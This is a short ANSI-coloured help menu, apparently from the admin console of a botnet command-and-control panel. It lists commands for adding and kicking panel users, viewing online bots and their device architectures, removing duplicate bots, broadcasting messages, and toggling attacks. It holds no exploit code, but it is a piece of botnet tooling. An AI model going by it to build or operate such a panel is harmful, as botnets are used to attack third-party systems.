\e[2J\e[3J\e[H\e[37mremuser\e[38;5;122m:\e[37m removes any user
\e[37monline\e[38;5;122m:\e[37m displays users online
\e[37marches\e[38;5;122m:\e[37m displays device arches
\e[37mbroadcastoff\e[38;5;122m:\e[37m turn off broadcast
\e[37madduser\e[38;5;122m:\e[37m add a common/admin user
\e[37mkickuser\e[38;5;122m:\e[37m kick a user from the cnc
\e[37mtoggleattacks\e[38;5;122m:\e[37m toggle attacks on/off
\e[37mdupesdeleted\e[38;5;122m:\e[37m displays dupes deleted
\e[37mmotd\e[38;5;122m:\e[37m gives out a mention of the day
\e[37mmotdoff\e[38;5;122m:\e[37m turns off mention of the day
\e[37mbroadcast\e[38;5;122m:\e[37m broadcast a message in the title bar
